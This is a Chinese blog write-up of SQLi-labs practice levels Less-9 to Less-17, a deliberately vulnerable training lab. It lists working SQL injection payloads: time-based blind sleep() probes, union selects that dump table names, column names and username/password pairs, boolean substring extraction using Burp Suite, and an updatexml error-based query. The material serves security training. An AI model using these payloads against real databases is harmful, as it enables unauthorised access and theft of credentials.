Bootstrap

Less-9~12,Less-16~17 攻略

除了Less-11外其他的最多到把库名查出来,因为后面和Less-11的代码基本一样

Less-9

Less-9闭合方式

时间盲注,闭合方式192.168.216.67/sqli/Less-9/?id=1' and sleep(5) --+

Less-9查询数据库 

http://192.168.216.67/sqli/Less-9/?id=1%27%20and%20if(substr(database(),1,1)=%27a%27,sleep(5),1)--+

 使用Burp suite抓包

 

 得到数据库是security

Less-10

Less-10闭合方式

http://192.168.216.67/sqli/Less-10/?id=1%22%20and%20sleep(5)--+

后面和Less-9一模一样

Less-11

Less-11闭合方式

Less-11列数

1' order by 2#

 Less-11跳过库名直接查询表名

1'  union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database())#

Less-11字段 

1'  union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')#

 Less-11数据

 1'  union select 1,(select group_concat(username,'~',password) from users)#

 

Less-12

Less-12闭合方式

Less-12后面与Less-11一样

Less-16

Less-16闭合方式

Less-16列数

 Less-16数据库长度

Less-16数据库名

admin") and substr((select  database()),1,1)='s' #

使用burp suite抓包

发送到攻击器

 

得到数据库名是security 

Less-17

Less-17注入点是New Password

Less-17闭合方式

Less-17库名

1' and updataxml(1,concat(0x7e,database(),0x7e),1)#

 

悦读

道可道,非常道;名可名,非常名。 无名,天地之始,有名,万物之母。 故常无欲,以观其妙,常有欲,以观其徼。 此两者,同出而异名,同谓之玄,玄之又玄,众妙之门。

最新收录
office 安装包 绿色版 2024 windows(附微软运行库合集)
基于Python的豆瓣电影论坛可视化分析【论文、源码、开题报告】
Python逻辑回归小案例教程
镜像视界---动态目标三维重构引擎核心优势解析
原生稀疏注意力机制NSA-通过算术强度平衡设计
【直播预告】第四范式&Intel AI应用与异构内存编程挑战赛
three.js设置部分颜色
Unity中的异步编程【7】——在一个异步方法里播放了animation动画,取消任务时,如何停止动画播放
阿里云百炼平台对接DeepSeek官方文档
mybatis-plus 用法总结
;